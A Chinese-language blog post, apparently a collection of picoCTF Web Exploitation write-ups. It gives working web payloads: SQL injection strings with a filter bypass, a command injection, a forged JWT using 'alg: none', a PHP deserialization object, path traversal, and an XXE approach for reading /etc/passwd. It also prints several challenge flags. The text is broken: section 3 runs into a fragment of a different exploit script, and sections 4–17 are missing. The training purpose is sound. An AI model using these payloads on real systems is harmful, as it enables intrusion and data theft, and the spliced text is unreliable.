文章目录
- 1. GET aHEAD
- 2. Cookies
- 3. Insp3ct0r
- 4. Scavenger Hunt
- 5. Bookmarklet
- 6. where are the robots
- 7. It is my Birthday
- 8. logon
- 9. dont-use-client-side
- 10. picobrowser
- 11. Client-side-again
- 12. Java Code Analysis!?!
- 13. Who are you
- 14. Login
- 15. JaWT Scratchpad
- 16. Some Assembly Required 1
- 17. More Cookies
- 18. caas
- 19. Some Assembly Required 2
- 20. SQL Direct
- 21. JAuth
- 22. Includes
- 23. Inspect HTML
- 24. Local Authority
- 25. Search source
- 26. findme
- 27. MatchTheRegex
- 28. SOAP
- 29. IntroToBurp
- 30. Unminify
- 31. Super Serial
- 32. Most Cookies
- 33. Forbidden Paths
- 34. Power Cookie
- 35. Roboto Sans
- 36. Web Gauntlet
- 37. Web Gauntlet 2
- 38. Web Gauntlet 3
- 39. Secrets
- 40. SQLiLite
- 41. More SQLi
- 42. Trickster
1. GET aHEAD
Find the flag being held on this server to get ahead of the competition
Hints
Check out tools like Burpsuite to modify your requests and look at the responses
根据提示使用不同的请求方式得到response可能会得到结果
使用抓包工具Burp Suit抓取链接请求信息
修改请求方式POST/GET为HEAD发送请求,获取包含flag的响应信息
The HEAD method asks for a response identical to a GET request, but without the response body.
HEAD 方法请求与 GET 请求相同的响应,但没有响应正文。
Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。
本题中使用 Proxy拦截请求的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。
Repeater手动操作来补发单独的HTTP 请求,并分析应用程序响应。
2. Cookies
Who doesn’t love cookies? Try to figure out the best one.
通过浏览器devTools工具获取cookie
发现一个value为-1
修改cookie值-1为1刷新页面得到**I love chocolate chip cookies!**
随着value 的值不断更新,返回提示信息也会不断更改,直到value=18
手动修改value值比较麻烦,可以使用python脚本找出value在一定范围内且返回信息包含有I love 字符串的,不包含的打印出来看看结果
import requests url = "http://mercury.picoctf.net:29649/check" for i in range(0, 20): text = str(i) cookies = { 'name': text } r = requests.get(url, cookies=cookies) result = r.text.split( "")[1].split("")[0] print("[+] Testing Cookie:{} | Result: {}".format(i, result)) if 'I love' not in result: print(r.text.split("")[1].split("")[0]) break
3. Insp3ct0r
Kishor Balan tipped us off that the following code may need inspection
Hints
How do you inspect web code on a browser?
There's 3 parts
根据提示检查代码,发现注释中有Flag信息,由三部分组成
HTML部分:
"auth_name": guess}) if "picoCTF{" in r.text: print(f"Admin bit found in byte {position_idx} bit {bit_idx}.") # The flag is between `` and ``. print("Flag: " + r.text.split("")[1].split("")[0]) return exploit()18. caas
Description
Now presenting cowsay as a service
从下载的js文件看到使用了exec()函数执行,可能存在执行权限问题
按提示url加上message信息加;ls 结果输出目录,说明可执行
继续加上;cat flag.txt 得到flag
19. Some Assembly Required 2
直接查看devTools wasm,得到xor密文
使用在线解密工具得到结果
20. SQL Direct
Description
Connect to this PostgreSQL server and find the flag!
Additional details will be available after launching your challenge instance.
Hints
What does a SQL database contain?
登录PostgreSQL 查询数据库,得到flag
21. JAuth
Description
Most web application developers use third party components without testing their security. Some of the past affected companies are:
- Equifax (a US credit bureau organization) - breach due to unpatched Apache Struts web framework CVE-2017-5638
- Mossack Fonesca (Panama Papers law firm) breach - unpatched version of Drupal CMS used
- VerticalScope (internet media company) - outdated version of vBulletin forum software used
Can you identify the components and exploit the vulnerable one?
Hints
Use the web browser tools to check out the JWT cookie.
The JWT should always have two (2) . separators.
登录user用户得到tocken,解签得到payload信息
利用这个jwt漏洞测试web token
首先关闭安全性,将“alg”设置为“none”,然后将角色设置为“admin”,然后省略末尾的签名,但保留尾随句点。
将cookie中的值修改为新的token,刷新得到Flag
22. Includes
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
Is there more code than what the inspector initially shows?
23. Inspect HTML
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
What is the web inspector in web browsers?
24. Local Authority
Description
Can you get the flag?
Additional details will be available after launching your challenge instance.
Hints
How is the password checked on this website?
此题考查密码的验证
先随便登录一下
js中直接明文展示账号密码
登录查看flag
25. Search source
Description
The developer of this website mistakenly left an important artifact in the website source, can you find it?
Hints
How could you mirror the website on your local machine so you could use more powerful tools for searching?
提示flag在网站源码中,devTools查看源码,发现在style.css中
也可以下载网站源码到本地,然后快捷查找picoCTF字符找到flag
26. findme
Description
Help us test the form by submiting the username as test and password as test!The website
Hints
any redirections?
使用描述中提供的账号进行登陆,提示可能有多个重定向,那我们登录时打开devTools重点关注重定向信息
发现两个重定向地址
**请求 URL:** http://saturn.picoctf.net:62931/next-page/id=cGljb0NURntwcm94aWVzX2Fs **请求 URL:** http://saturn.picoctf.net:62931/next-page/id=bF90aGVfd2F5X2JlNzE2ZDhlfQ==
id组合一下cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5X2JlNzE2ZDhlfQ== 像是base64加密信息,解密一下得到Flag
27. MatchTheRegex
Description
How about trying to match a regular expression
Additional details will be available after launching your challenge instance.
Hints
Access the webpage and try to match the regular expression associated with the text field
提示与正则匹配有关,先查看源码
发现一个以p开头H结束的注释,试一下flag前缀picoCTF,submit弹出结果
28. SOAP
Description
The web project was rushed and no security assessment was done. Can you read the /etc/passwd file?
Hints
XML external entity Injection
描述中网站没有进行安全评估,让试试读取/etc/passwd文件,提示可以利用用XML注入
XXE漏洞全称XML External Entity Injection即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件
点击任意按钮,发现请求数据为XML
使用Brup suite抓取请求,构建XML为如下,重新发送,获取返回flag
29. IntroToBurp
Hints
Try using burpsuite to intercept request to capture the flag.
Try mangling the request, maybe their server-side code doesn't handle malformed requests very well.
尝试处理请求,也许他们的服务器端代码不能很好地处理格式错误的请求
首先填写表单提交,进入OPT提交页面
使用burpsuite拦截请求
我们根据提示来尝试修改opt请求参数,参数值修改意义不大,修改参数名称试试
30. Unminify
Description
I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!
Hints
Try CTRL+U / ⌘+U in your browser to view the page source. You can also add 'view-source:' before the URL, or try curl
in your shell. Minification reduces the size of code, but does not change its functionality.
What tools do developers use when working on a website? Many text editors and browsers include formatting.
进入网页,提示使用ctrl+u查看页面源码,那就照做吧,结果直接找到了flag
31. Super Serial
Description
Try to recover the flag stored on this website http://mercury.picoctf.net:2148/
Hints
The flag is at ../flag
提示flag信息在服务器端上层目录下的flag文件中,我们在web目录下是找不到的
查看robots.txt看到一个admin.phps,那么我们可以查看页面的php源码(phps文件就是php的源代码文件)
先看http://mercury.picoctf.net:2148/index.phps,得到如下信息
看到有一个authentication.php页面,应该就是权限验证页面
if(isset($_POST["user"]) && isset($_POST["pass"])){ $con = new SQLite3("../users.db"); $username = $_POST["user"]; $password = $_POST["pass"]; $perm_res = new permissions($username, $password); if ($perm_res->is_guest() || $perm_res->is_admin()) { setcookie("login", urlencode(base64_encode(serialize($perm_res))), time() + (86400 * 30), "/"); header("Location: authentication.php"); die(); } else { $msg = 'Invalid Login.
'; } }访问http://mercury.picoctf.net:2148/authentication.phps查看源码,找到有一个cookie.php页面
require_once("cookie.php"); if(isset($perm) && $perm->is_admin()){ $msg = "Welcome admin"; $log = new access_log("access.log"); $log->append_to_log("Logged in at ".date("Y-m-d")."\n"); } else { $msg = "Welcome guest"; }继续访问http://mercury.picoctf.net:2148/cookie.phps,找到如下代码
if(isset($_COOKIE["login"])){ try{ $perm = unserialize(base64_decode(urldecode($_COOKIE["login"]))); $g = $perm->is_guest(); $a = $perm->is_admin(); } catch(Error $e){ die("Deserialization error. ".$perm); } }使用了unserialize函数进行反序列化名为login的参数
试一试PHP的反序列化漏洞:
我们在登录 cookie 中存储一个序列化的 access_log 对象,log_file设置为 ../flag。此对象将在 try 块的第一行中进行反序列化。但是,access_log 类没有 is_guest 函数,因此$g = $perm->is_guest()它将失败,从而跳转到 catch 块。此 catch 块打印 $perm 的值,这是我们注入的access_log对象。通过打印$perm,调用了 access_log 对象的 _toString 方法,该方法将打印access_log的内容
构建access_log对象:O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}
base64加密一下:TzoxMDoiYWNjZXNzX2xvZyI6MTp7czo4OiJsb2dfZmlsZSI7czo3OiIuLi9mbGFnIjt9
我们在authentication.php请求cookie中加入一个login的参数,得到Flag
32. Most Cookies
picoCTF-Web Exploitation-Most Cookies
33. Forbidden Paths
Description
Can you get the flag?We know that the website files live in /usr/share/nginx/html/ and the flag is at /flag.txt but the website is filtering absolute file paths. Can you get past the filter to read the flag?
描述中我们知道网站文件在/usr/share/nginx/html/ ****目录下,flag.txt在根目录下/
直接使用../../../../../flag.txt切换到根目录试一下,直接得出flag
34. Power Cookie
Description
Can you get the flag?
Hints
Do you know how to modify cookies?
这也是一个修改cookie的题,我们先直接点击按钮,查看cookie信息
看到isAdmin值是0,我们改成1,刷新一下直接得到flag
35. Roboto Sans
Description
The flag is somewhere on this web application not necessarily on the website. Find it.
根据题目我们试试找到robots.txt,直接访问得到信息
User-agent * Disallow: /cgi-bin/ Think you have seen your flag or want to keep looking. ZmxhZzEudHh0;anMvbXlmaW anMvbXlmaWxlLnR4dA== svssshjweuiwl;oiho.bsvdaslejg Disallow: /wp-admin/
提示查看这里可以得到flag线索,下面有两串密文,我们用base64解密看看是什么
ZmxhZzEudHh0;anMvbXlmaW -- flag1.txtjs/myfi anMvbXlmaWxlLnR4dA== -- js/myfile.txt
flag1.txt js/myfile.txt 两个都试一试,falg1.txt返回404,js/myfile.txt得到结果
36. Web Gauntlet
picoCTF-Web Exploitation-Web Gauntlet
37. Web Gauntlet 2
Description
This website looks familiar… Log in as admin
Site: http://mercury.picoctf.net:65261/
Filter: http://mercury.picoctf.net:65261/filter.php
Hints
I tried to make it a little bit less contrived since the mini competition.
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
There is a length component now.
sqlite
Filters: or and true false union like = > < ; – / / admin
上一关中能用的关键词这一关中都被禁用了
过滤了admin因此我们继续使用ad'||'min
SELECT username, password FROM users WHERE username='ad'||'min' AND password='1'
下载就剩一个password匹配了,如何能匹配到任意密码:使用' glob '*
构建出的sql为
SELECT username, password FROM users WHERE username='ad'||'min' AND password='' glob '*'
刷新filter.php得到flag
$_SESSION["winner2"] = 0; } $win = $_SESSION["winner2"]; $view = ($_SERVER["PHP_SELF"] == "/filter.php"); if ($win === 0) { $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin"); if ($view) { echo "Filters: ".implode(" ", $filter)."
"; } } else if ($win === 1) { if ($view) { highlight_file("filter.php"); } $_SESSION["winner2"] = 0; // <- Don't refresh! } else { $_SESSION["winner2"] = 0; } // picoCTF{0n3_m0r3_t1m3_e2db86ae880862ad471aa4c93343b2bf} ?>38. Web Gauntlet 3
Description
Last time, I promise! Only 25 characters this time. Log in as admin Site: http://mercury.picoctf.net:8650/
Filter: http://mercury.picoctf.net:8650/filter.php
查看**filter.php**
Filters: or and true false union like = > < ; – / / admin
这不跟上一关一样吗,直接使用上一关用户名密码试试,提示成功,刷新filter.php拿到结果
$_SESSION["winner3"] = 0; } $win = $_SESSION["winner3"]; $view = ($_SERVER["PHP_SELF"] == "/filter.php"); if ($win === 0) { $filter = array("or", "and", "true", "false", "union", "like", "=", ">", "<", ";", "--", "/*", "*/", "admin"); if ($view) { echo "Filters: ".implode(" ", $filter)."
"; } } else if ($win === 1) { if ($view) { highlight_file("filter.php"); } $_SESSION["winner3"] = 0; // <- Don't refresh! } else { $_SESSION["winner3"] = 0; } // picoCTF{k3ep_1t_sh0rt_6fdd78c92c7f26a10acd3ece176dea4d} ?>39. Secrets
Description
We have several pages hidden. Can you find the one with the flag?The website is running here.
Hints
folders folders folders
根据提示应该有三个文件夹,查看源码发现一个secret
home 
If security wasn't your job, would you do it as a hobby?
访问http://saturn.picoctf.net:55637/secret/
提示步骤正确,继续看源码,找到一个hidden
Finally. You almost found me. you are doing well
......
访问http://saturn.picoctf.net:55637/secret/hidden/ 找到一个superhidden
LOGIN 访问http://saturn.picoctf.net:55637/secret/hidden/superhidden/ 查看源码找到flag
Finally. You found me. But can you see me
picoCTF{succ3ss_@h3n1c@10n_790d2615}
40. SQLiLite
Description
Can you login to this website?
Hints
'admin' is the user you want to login as.
使用admin登录,密码随便填得到sql语句
username: admin password: 123 SQL query: SELECT * FROM users WHERE name='admin' AND password='123'
试一下密码 'or 1=1 -- 构建sql为
-- username: admin -- password: 'or 1=1 -- SELECT * FROM users WHERE name='admin' AND password=''or 1=1 -- '
查看源码可得到flag
41. More SQLi
picoCTF-Web Exploitation-More SQLi
42. Trickster
picoCTF-Web Exploitation-Trickster
![[工业自动化-1]:PLC架构与工作原理](https://img-blog.csdnimg.cn/ce10a1471ed14382bc58364cf8bd5209.png)
还没有评论,来说两句吧...